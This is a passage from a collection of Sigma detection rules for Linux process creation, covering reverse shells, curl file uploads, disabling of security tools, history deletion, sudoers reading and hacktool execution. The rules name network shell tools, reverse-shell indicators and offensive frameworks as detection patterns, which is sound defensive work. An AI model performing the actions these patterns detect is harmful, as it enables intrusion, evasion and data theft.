references: - https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/ - https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10 author: Florian Roth date: 2025-01-18 tags: - attack.execution - attack.t1059 - attack.t1203 logsource: category: process_creation product: linux detection: selection: ParentImage|endswith: - '/rsync' - '/rsyncd' Image|endswith: - '/ash' - '/bash' - '/csh' - '/dash' - '/ksh' - '/sh' - '/tcsh' - '/zsh' filter_main_expected: CommandLine|contains: ' -e ' condition: selection and not 1 of filter_main_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml ================================================ title: Potential Ruby Reverse Shell id: b8bdac18-c06e-4016-ac30-221553e74f59 status: test description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ author: '@d4ns4n_' date: 2023-04-07 tags: - attack.execution logsource: category: process_creation product: linux detection: selection: Image|contains: 'ruby' CommandLine|contains|all: - ' -e' - 'rsocket' - 'TCPSocket' CommandLine|contains: - ' ash' - ' bash' - ' bsh' - ' csh' - ' ksh' - ' pdksh' - ' sh' - ' tcsh' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml ================================================ title: Scheduled Cron Task/Job - Linux id: 6b14bac8-3e3a-4324-8109-42f0546a347f status: test description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md author: Alejandro Ortuno, oscd.community date: 2020-10-06 modified: 2022-11-27 tags: - attack.execution - attack.persistence - attack.privilege-escalation - attack.t1053.003 logsource: category: process_creation product: linux detection: selection: Image|endswith: 'crontab' CommandLine|contains: '/tmp/' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml ================================================ title: Security Software Discovery - Linux id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 status: test description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md author: Daniil Yugoslavskiy, oscd.community date: 2020-10-19 modified: 2022-11-27 tags: - attack.discovery - attack.t1518.001 logsource: category: process_creation product: linux detection: selection: Image|endswith: # You can add more grep variations such as fgrep, rgrep...etc - '/grep' - '/egrep' CommandLine|contains: - 'nessusd' # nessus vulnerability scanner - 'td-agent' # fluentd log shipper - 'packetbeat' # elastic network logger/shipper - 'filebeat' # elastic log file shipper - 'auditbeat' # elastic auditing agent/log shipper - 'osqueryd' # facebook osquery - 'cbagentd' # carbon black - 'falcond' # crowdstrike falcon condition: selection falsepositives: - Legitimate activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml 
================================================ title: Disabling Security Tools id: e3a8a052-111f-4606-9aee-f28ebeb76776 status: test description: Detects disabling security tools references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md author: Ömer Günal, Alejandro Ortuno, oscd.community date: 2020-06-17 modified: 2022-10-09 tags: - attack.defense-evasion - attack.t1562.004 logsource: category: process_creation product: linux detection: selection_iptables_1: Image|endswith: '/service' CommandLine|contains|all: - 'iptables' - 'stop' selection_iptables_2: Image|endswith: '/service' CommandLine|contains|all: - 'ip6tables' - 'stop' selection_iptables_3: Image|endswith: '/chkconfig' CommandLine|contains|all: - 'iptables' - 'stop' selection_iptables_4: Image|endswith: '/chkconfig' CommandLine|contains|all: - 'ip6tables' - 'stop' selection_firewall_1: Image|endswith: '/systemctl' CommandLine|contains|all: - 'firewalld' - 'stop' selection_firewall_2: Image|endswith: '/systemctl' CommandLine|contains|all: - 'firewalld' - 'disable' selection_carbonblack_1: Image|endswith: '/service' CommandLine|contains|all: - 'cbdaemon' - 'stop' selection_carbonblack_2: Image|endswith: '/chkconfig' CommandLine|contains|all: - 'cbdaemon' - 'off' selection_carbonblack_3: Image|endswith: '/systemctl' CommandLine|contains|all: - 'cbdaemon' - 'stop' selection_carbonblack_4: Image|endswith: '/systemctl' CommandLine|contains|all: - 'cbdaemon' - 'disable' selection_selinux: Image|endswith: '/setenforce' CommandLine|contains: '0' selection_crowdstrike_1: Image|endswith: '/systemctl' CommandLine|contains|all: - 'stop' - 'falcon-sensor' selection_crowdstrike_2: Image|endswith: '/systemctl' CommandLine|contains|all: - 'disable' - 'falcon-sensor' condition: 1 of selection* falsepositives: - Legitimate administration activities level: medium ================================================ FILE: 
rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml ================================================ title: Disable Or Stop Services id: de25eeb8-3655-4643-ac3a-b662d3f26b6b status: test description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services references: - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html author: Nasreddine Bencherchali (Nextron Systems) date: 2022-09-15 tags: - attack.defense-evasion logsource: category: process_creation product: linux detection: selection: Image|endswith: - '/service' - '/systemctl' - '/chkconfig' CommandLine|contains: - 'stop' - 'disable' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml ================================================ title: Setuid and Setgid id: c21c4eaa-ba2e-419a-92b2-8371703cbe21 status: test description: Detects suspicious change of file privileges with chown and chmod commands references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md author: Ömer Günal date: 2020-06-16 modified: 2022-10-05 tags: - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.t1548.001 logsource: product: linux category: process_creation detection: selection_root: CommandLine|contains: 'chown root' selection_perm: CommandLine|contains: - ' chmod u+s' - ' chmod g+s' condition: all of selection_* falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_ssh_shell_execution.yml ================================================ title: Shell Invocation Via Ssh - Linux id: 8737b7f6-8df3-4bb7-b1da-06019b99b687 status: test description: | 
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. references: - https://gtfobins.github.io/gtfobins/ssh/ - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) date: 2024-08-29 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/ssh' CommandLine|contains: - 'ProxyCommand=;' - 'permitlocalcommand=yes' - 'localhost' selection_cli: CommandLine|contains: - '/bin/bash' - '/bin/dash' - '/bin/fish' - '/bin/sh' - '/bin/zsh' - 'sh 0<&2 1>&2' - 'sh 1>&2 0<&2' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml ================================================ title: Potential Linux Amazon SSM Agent Hijacking id: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7 status: test description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. 
references: - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/ - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/ author: Muhammad Faisal date: 2023-08-03 tags: - attack.command-and-control - attack.persistence - attack.t1219.002 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/amazon-ssm-agent' CommandLine|contains|all: - '-register ' - '-code ' - '-id ' - '-region ' condition: selection falsepositives: - Legitimate activity of system administrators level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml ================================================ title: Chmod Suspicious Directory id: 6419afd1-3742-47a5-a7e6-b50386cd15f8 status: test description: Detects chmod targeting files in abnormal directory paths. references: - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' date: 2022-06-03 tags: - attack.defense-evasion - attack.t1222.002 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/chmod' CommandLine|contains: - '/tmp/' - '/.Library/' - '/etc/' - '/opt/' condition: selection falsepositives: - Admin changing file permissions. 
level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml ================================================ title: Container Residence Discovery Via Proc Virtual FS id: 746c86fb-ccda-4816-8997-01386263acc4 status: test description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem references: - https://blog.skyplabs.net/posts/container-detection/ - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker tags: - attack.discovery - attack.t1082 author: Seth Hanford date: 2023-08-23 logsource: category: process_creation product: linux detection: selection_tools: Image|endswith: - 'awk' - '/cat' - 'grep' - '/head' - '/less' - '/more' - '/nl' - '/tail' selection_procfs_kthreadd: # outside containers, PID 2 == kthreadd CommandLine|contains: '/proc/2/' selection_procfs_target: CommandLine|contains: '/proc/' CommandLine|endswith: - '/cgroup' # cgroups end in ':/' outside containers - '/sched' # PID mismatch when run in containers condition: selection_tools and 1 of selection_procfs_* falsepositives: - Legitimate system administrator usage of these commands - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml ================================================ title: Suspicious Curl File Upload - Linux id: 00b90cc1-17ec-402c-96ad-3a8117d7a582 related: - id: 00bca14a-df4e-4649-9054-3f2aa676bc04 type: derived status: test description: Detects a suspicious curl process start that adds a file to a web request references: - https://twitter.com/d1r4c/status/1279042657508081664 - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 -
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file - https://curl.se/docs/manpage.html - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) date: 2022-09-15 modified: 2023-05-02 tags: - attack.exfiltration - attack.command-and-control - attack.t1567 - attack.t1105 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/curl' selection_cli: - CommandLine|contains: - ' --form' # Also covers the "--form-string" - ' --upload-file ' - ' --data ' - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" - CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection filter_optional_localhost: CommandLine|contains: - '://localhost' - '://127.0.0.1' condition: all of selection_* and not 1 of filter_optional_* falsepositives: - Scripts created by developers and admins level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml ================================================ title: Suspicious Curl Change User Agents - Linux id: b86d356d-6093-443d-971c-9b07db583c68 related: - id: 3286d37a-00fd-41c2-a624-a672dcd34e60 type: derived status: test description: Detects a suspicious curl process start on linux with set useragent options references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) date: 2022-09-15 tags: - attack.command-and-control - attack.t1071.001 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/curl' CommandLine|contains: - ' -A ' - ' --user-agent ' condition: selection falsepositives: - Scripts created by developers and admins - Administrative activity level: 
medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml ================================================ title: Docker Container Discovery Via Dockerenv Listing id: 11701de9-d5a5-44aa-8238-84252f131895 status: test description: Detects listing or file reading of ".dockerenv" which can be a sign of potential container discovery references: - https://blog.skyplabs.net/posts/container-detection/ - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker tags: - attack.discovery - attack.t1082 author: Seth Hanford date: 2023-08-23 logsource: category: process_creation product: linux detection: selection: Image|endswith: # Note: add additional tools and utilities to increase coverage - '/cat' - '/dir' - '/find' - '/ls' - '/stat' - '/test' - 'grep' CommandLine|endswith: '.dockerenv' condition: selection falsepositives: - Legitimate system administrator usage of these commands - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml ================================================ title: Potentially Suspicious Execution From Tmp Folder id: 312b42b1-bded-4441-8b58-163a3af58775 status: test description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 modified: 2025-08-05 tags: -
attack.defense-evasion - attack.t1036 logsource: product: linux category: process_creation detection: selection: Image|startswith: '/tmp/' filter_optional_nextcloud: Image|endswith: '/usr/bin/nextcloud' condition: selection and not 1 of filter_optional_* falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml ================================================ title: Potential Discovery Activity Using Find - Linux id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf related: - id: 85de3a19-b675-4a51-bfc6-b11a5186c971 type: similar status: test description: Detects usage of the "find" binary in a suspicious manner to perform discovery references: - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes author: Nasreddine Bencherchali (Nextron Systems) date: 2022-12-28 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/find' CommandLine|contains: - '-perm -4000' - '-perm -2000' - '-perm 0777' - '-perm -222' - '-perm -o w' - '-perm -o x' - '-perm -u=s' - '-perm -g=s' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml ================================================ title: Suspicious Git Clone - Linux id: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446 status: test description: Detects execution of "git" in order to clone a remote repository whose name contains suspicious keywords references: - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt author: Nasreddine Bencherchali (Nextron Systems) date: 2023-01-03 modified: 2023-01-05 tags: - attack.reconnaissance - attack.t1593.003 logsource: category: process_creation product: linux detection: selection_img:
Image|endswith: '/git' CommandLine|contains: ' clone ' selection_keyword: CommandLine|contains: # Add more suspicious keywords - 'exploit' - 'Vulns' - 'vulnerability' - 'RCE' - 'RemoteCodeExecution' - 'Invoke-' - 'CVE-' - 'poc-' - 'ProofOfConcept' # Add more vuln names - 'proxyshell' - 'log4shell' - 'eternalblue' - 'eternal-blue' - 'MS17-' condition: all of selection_* falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml ================================================ title: History File Deletion id: 1182f3b3-e716-4efa-99ab-d2685d04360f status: test description: Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity references: - https://github.com/sleventyeleven/linuxprivchecker/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md author: Florian Roth (Nextron Systems) date: 2022-06-20 modified: 2022-09-15 tags: - attack.impact - attack.t1565.001 logsource: category: process_creation product: linux detection: selection: Image|endswith: - '/rm' - '/unlink' - '/shred' selection_history: - CommandLine|contains: - '/.bash_history' - '/.zsh_history' - CommandLine|endswith: - '_history' - '.history' - 'zhistory' condition: all of selection* falsepositives: - Legitimate administration activities level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml ================================================ title: Print History File Contents id: d7821ff1-4527-4e33-9f84-d0d57fa2fb66 status: test description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance references: - https://github.com/sleventyeleven/linuxprivchecker/ -
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md author: Florian Roth (Nextron Systems) date: 2022-06-20 modified: 2022-09-15 tags: - attack.reconnaissance - attack.t1592.004 logsource: category: process_creation product: linux detection: selection: Image|endswith: - '/cat' - '/head' - '/tail' - '/more' selection_history: - CommandLine|contains: - '/.bash_history' - '/.zsh_history' - CommandLine|endswith: - '_history' - '.history' - 'zhistory' condition: all of selection* falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml ================================================ title: Linux HackTool Execution id: a015e032-146d-4717-8944-7a1884122111 status: test description: Detects known hacktool execution based on image name. references: - https://github.com/Gui774ume/ebpfkit - https://github.com/pathtofile/bad-bpf - https://github.com/carlospolop/PEASS-ng - https://github.com/t3l3machus/hoaxshell - https://github.com/t3l3machus/Villain - https://github.com/HavocFramework/Havoc - https://github.com/1N3/Sn1per - https://github.com/Ne0nd0g/merlin - https://github.com/Pennyw0rth/NetExec/ author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure]) date: 2023-01-03 modified: 2024-09-19 tags: - attack.execution - attack.resource-development - attack.t1587 logsource: product: linux category: process_creation detection: selection_c2_frameworks: Image|endswith: - '/crackmapexec' - '/havoc' - '/merlin-agent' - '/merlinServer-Linux-x64' - '/msfconsole' - '/msfvenom' - '/ps-empire server' - '/ps-empire' - '/sliver-client' - '/sliver-server' - '/Villain.py' selection_c2_framework_cobaltstrike: Image|contains: - '/cobaltstrike' - '/teamserver' selection_scanners: Image|endswith: - '/autorecon' - '/httpx' - '/legion' - '/naabu' - '/netdiscover' - 
'/nuclei' - '/recon-ng' selection_scanners_sniper: Image|contains: '/sniper' selection_web_enum: Image|endswith: - '/dirb' - '/dirbuster' - '/eyewitness' - '/feroxbuster' - '/ffuf' - '/gobuster' - '/wfuzz' - '/whatweb' selection_web_vuln: Image|endswith: - '/joomscan' - '/nikto' - '/wpscan' selection_exploit_tools: Image|endswith: - '/aircrack-ng' - '/bloodhound-python' - '/bpfdos' - '/ebpfki' - '/evil-winrm' - '/hashcat' - '/hoaxshell.py' - '/hydra' - '/john' - '/ncrack' # default binary: https://github.com/Pennyw0rth/NetExec/releases/download/v1.0.0/nxc-ubuntu-latest - '/nxc-ubuntu-latest' - '/pidhide' - '/pspy32' - '/pspy32s' - '/pspy64' - '/pspy64s' - '/setoolkit' - '/sqlmap' - '/writeblocker' selection_linpeas: # covers: all linux versions listed here: https://github.com/carlospolop/PEASS-ng/releases Image|contains: '/linpeas' condition: 1 of selection_* falsepositives: - Unlikely level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml ================================================ title: Potential Container Discovery Via Inodes Listing id: 43e26eb5-cd58-48d1-8ce9-a273f5d298d8 status: test description: Detects listing of the inodes of the "/" directory to determine if we are running inside of a container.
references: - https://blog.skyplabs.net/posts/container-detection/ - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker tags: - attack.discovery - attack.t1082 author: Seth Hanford date: 2023-08-23 modified: 2025-11-24 logsource: category: process_creation product: linux detection: selection_ls_img: Image|endswith: '/ls' # inode outside containers low, inside high selection_ls_cli: - CommandLine|endswith: ' /' - CommandLine|contains: ' / ' selection_regex_inode: CommandLine|re: '(?:\s-[^-\s]{0,20}i|\s--inode\s)' # -i finds inode number selection_regex_dir: CommandLine|re: '(?:\s-[^-\s]{0,20}d|\s--directory\s)' # -d gets directory itself, not contents condition: all of selection_* falsepositives: - Legitimate system administrator usage of these commands - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml ================================================ title: Interactive Bash Suspicious Children id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 status: test description: Detects suspicious interactive bash as a parent to rather uncommon child processes references: - Internal Research author: Florian Roth (Nextron Systems) date: 2022-03-14 tags: - attack.execution - attack.defense-evasion - attack.t1059.004 - attack.t1036 logsource: product: linux category: process_creation detection: selection: ParentCommandLine: 'bash -i' anomaly1: CommandLine|contains: - '-c import ' - 'base64' - 'pty.spawn' anomaly2: Image|endswith: - 'whoami' - 'iptables' - '/ncat' - '/nc' - '/netcat' condition: selection and 1 of anomaly* falsepositives: - Legitimate software that uses these patterns level: medium ================================================ FILE: 
rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml ================================================ title: Suspicious Java Children Processes id: d292e0af-9a18-420c-9525-ec0ac3936892 status: test description: Detects a java process spawning suspicious children references: - https://www.tecmint.com/different-types-of-linux-shells/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022-06-03 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection: ParentImage|endswith: '/java' CommandLine|contains: - '/bin/sh' - 'bash' - 'dash' - 'ksh' - 'zsh' - 'csh' - 'fish' - 'curl' - 'wget' - 'python' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml ================================================ title: Linux Network Service Scanning Tools Execution id: 3e102cd9-a70d-4a7a-9508-403963092f31 status: test description: Detects execution of network scanning and reconnaissance tools. These tools can be used for the enumeration of local or remote network services for example. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md - https://github.com/projectdiscovery/naabu - https://github.com/Tib3rius/AutoRecon author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure]) date: 2020-10-21 modified: 2024-09-19 tags: - attack.discovery - attack.t1046 logsource: category: process_creation product: linux detection: selection_netcat: Image|endswith: - '/nc' - '/ncat' - '/netcat' - '/socat' selection_network_scanning_tools: Image|endswith: - '/autorecon' - '/hping' - '/hping2' - '/hping3' - '/naabu' - '/nmap' - '/nping' - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection.
consider fine tuning - '/zenmap' filter_main_netcat_listen_flag: CommandLine|contains: - ' --listen ' - ' -l ' condition: (selection_netcat and not filter_main_netcat_listen_flag) or selection_network_scanning_tools falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml ================================================ title: Linux Shell Pipe to Shell id: 880973f3-9708-491c-a77b-2a35a1921158 status: test description: Detects a suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - Internal Research author: Florian Roth (Nextron Systems) date: 2022-03-14 modified: 2022-07-26 tags: - attack.defense-evasion - attack.t1140 logsource: product: linux category: process_creation detection: selection: CommandLine|startswith: - 'sh -c ' - 'bash -c ' selection_exec: - CommandLine|contains: - '| bash ' - '| sh ' - '|bash ' - '|sh ' - CommandLine|endswith: - '| bash' - '| sh' - '|bash' - ' |sh' condition: all of selection* falsepositives: - Legitimate software that uses these patterns level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_process_reading_sudoers.yml ================================================ title: Access of Sudoers File Content id: 0f79c4d2-4e1f-4683-9c36-b5469a665e06 status: test description: Detects the execution of text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
references: - https://github.com/sleventyeleven/linuxprivchecker/ author: Florian Roth (Nextron Systems) date: 2022-06-20 modified: 2025-06-04 tags: - attack.reconnaissance - attack.t1592.004 logsource: category: process_creation product: linux detection: selection: Image|endswith: - '/cat' - '/ed' - '/egrep' - '/emacs' - '/fgrep' - '/grep' - '/head' - '/less' - '/more' - '/nano' - '/tail' CommandLine|contains: ' /etc/sudoers' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml ================================================ title: Linux Recon Indicators id: 0cf7a157-8879-41a2-8f55-388dd23746b7 status: test description: Detects events with patterns found in commands used for reconnaissance on linux systems references: - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py author: Florian Roth (Nextron Systems) date: 2022-06-20 tags: - attack.reconnaissance - attack.t1592.004 - attack.credential-access - attack.t1552.001 logsource: category: process_creation product: linux detection: selection: CommandLine|contains: - ' -name .htpasswd' - ' -perm -4000 ' condition: selection falsepositives: - Legitimate administration activities level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml ================================================ title: Potential Suspicious Change To Sensitive/Critical Files id: 86157017-c2b1-4d4a-8c33-93b8e67e4af4 status: test description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. 
references: - https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor author: '@d4ns4n_ (Wuerth-Phoenix)' date: 2023-05-30 tags: - attack.impact - attack.t1565.001 logsource: category: process_creation product: linux detection: selection_img_1: Image|endswith: - '/cat' - '/echo' - '/grep' - '/head' - '/more' - '/tail' CommandLine|contains: '>' selection_img_2: Image|endswith: - '/emacs' - '/nano' - '/sed' - '/vi' - '/vim' selection_paths: CommandLine|contains: - '/bin/login' - '/bin/passwd' - '/boot/' - '/etc/*.conf' - '/etc/cron.' # Covers different cron config files "daily", "hourly", etc. - '/etc/crontab' - '/etc/hosts' - '/etc/init.d' - '/etc/sudoers' - '/opt/bin/' - '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/' - '/usr/bin/' - '/usr/local/bin/' condition: 1 of selection_img_* and selection_paths falsepositives: - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed. 
level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml ================================================ title: Shell Execution Of Process Located In Tmp Directory id: 2fade0b6-7423-4835-9d4f-335b39b83867 status: test description: Detects execution of shells from a parent process located in a temporary (/tmp) directory references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 tags: - attack.execution logsource: product: linux category: process_creation detection: selection: ParentImage|startswith: '/tmp/' Image|endswith: - '/bash' - '/csh' - '/dash' - '/fish' - '/ksh' - '/sh' - '/zsh' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml ================================================ title: Execution Of Script Located In Potentially Suspicious Directory id: 30bcce26-51c5-49f2-99c8-7b59e3af36c7 status: test description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. 
references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 tags: - attack.execution logsource: product: linux category: process_creation detection: selection_img: Image|endswith: - '/bash' - '/csh' - '/dash' - '/fish' - '/ksh' - '/sh' - '/zsh' selection_flag: CommandLine|contains: ' -c ' selection_paths: # Note: Add more suspicious paths CommandLine|contains: '/tmp/' condition: all of selection_* falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml ================================================ title: System Information Discovery id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 status: stable description: Detects system information discovery commands references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md author: Ömer Günal, oscd.community date: 2020-10-08 modified: 2021-09-14 tags: - attack.discovery - attack.t1082 logsource: product: linux category: process_creation detection: selection: Image|endswith: - '/uname' - '/hostname' - '/uptime' - '/lspci' - '/dmidecode' - '/lscpu' - '/lsmod' condition: selection falsepositives: - Legitimate administration activities level: informational ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml ================================================ title: System Network Connections Discovery - Linux id: 4c519226-f0cd-4471-bd2f-6fbb2bb68a79 status: test description: Detects usage of system utilities to discover system 
